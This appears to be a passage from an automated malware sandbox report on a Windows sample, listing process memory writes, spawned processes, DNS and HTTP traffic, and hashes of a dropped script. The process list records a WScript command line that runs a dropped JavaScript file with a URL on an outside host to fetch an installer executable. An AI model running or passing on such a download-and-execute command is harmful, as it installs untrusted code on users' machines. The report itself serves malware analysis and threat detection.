PID 4344 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3558.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf3558.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3558.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf3558.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3558.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf3558.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3558.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf3558.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3558.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf3558.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4344 -ip 4344

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4344 -s 1460

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 bi.downthat.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 3.130.253.23:80 bi.downthat.com tcp
US 8.8.8.8:53 23.253.130.3.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 bi.downthat.com udp
US 3.130.204.160:80 bi.downthat.com tcp
US 8.8.8.8:53 www.hugedomains.com udp
US 8.8.8.8:53 160.204.130.3.in-addr.arpa udp
US 8.8.8.8:53 www.djapp.info udp
US 3.130.204.160:80 bi.downthat.com tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 www.djapp.info udp
US 3.130.204.160:80 bi.downthat.com tcp
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 bi.downthat.com udp
US 3.130.253.23:80 bi.downthat.com tcp
US 8.8.8.8:53 98.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\fuf3558.js

MD5 3813cab188d1de6f92f8b82c2059991b
SHA1 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256 a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA512 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76